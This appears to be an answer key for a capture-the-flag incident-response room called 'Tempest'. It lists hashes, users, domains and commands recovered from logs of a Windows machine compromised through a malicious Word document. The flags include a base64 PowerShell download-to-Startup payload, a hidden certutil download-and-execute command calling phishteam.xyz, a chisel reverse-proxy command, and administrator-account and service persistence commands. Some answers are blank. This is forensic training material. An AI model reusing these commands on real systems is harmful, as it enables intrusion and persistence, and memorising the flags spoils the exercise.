Tempest

Flags

FLAG SUMMARY

Preparation

What is the SHA256 hash of the capture.pcapng file?

CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

What is the SHA256 hash of the sysmon.evtx file?

665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

What is the SHA256 hash of the windows.evtx file?

D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

Initial Access

The user of this machine was compromised by a malicious document. What is the file name of the document?

free_magicules.doc

What is the name of the compromised user and machine? (username-machine name)

benimaru-TEMPEST

What is the PID of the Microsoft Word process that opened the malicious document?

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

167.71.199.191

What is the base64 encoded string in the malicious payload executed by the document?

JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==

What is the CVE number of the exploit used by the attacker to achieve a remote code execution? (Format: XXXX-XXXXX)

2022-30190

The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?

C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user? (Format: Remove the double quotes from the log.)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hiddennoni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?

CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker? (Format: domain:port)

resolvecyber.xyz:80

What is the URL of the malicious payload embedded in the document?

http://phishteam.xyz/02dcf07/index.html

What is the encoding used by the attacker on the c2 connection?

base64

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?

/9ab62b5

What is the HTTP method used by the binary?

GET

Based on the user agent, what programming language was used by the attacker to compile the binary? (Format: Answer in lowercase)

nim

Discovery

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

infernotempest

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection? (Format: Remove the double quotes from the log.)

C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?

8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.

chisel

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate? (Format: Answer in lowercase)

winrm

Privilege Escalation

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary? (Format: binary name,SHA256 hash)

spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Based on the SHA256 hash of the binary, what is the name of the tool used? (Format: Answer in lowercase)

printspoofer

The tool exploits a specific privilege owned by the user. What is the name of the privilege?

SeImpersonatePrivilege

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?

final.exe

The binary connects to a different port from the first c2 connection. What is the port used?

Actions on Objectives

Upon achieving SYSTEM access, the attacker then created two users. What are the account names? (Format: Answer in alphabetical order - comma delimited)

shion,shuna

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?

/add

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?

The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?

net localgroup administrators /add shion

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this? (Format: Remove the double quotes from the log.)

C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\fina

PreviousFlags NextRed Team

Last updated 7 months ago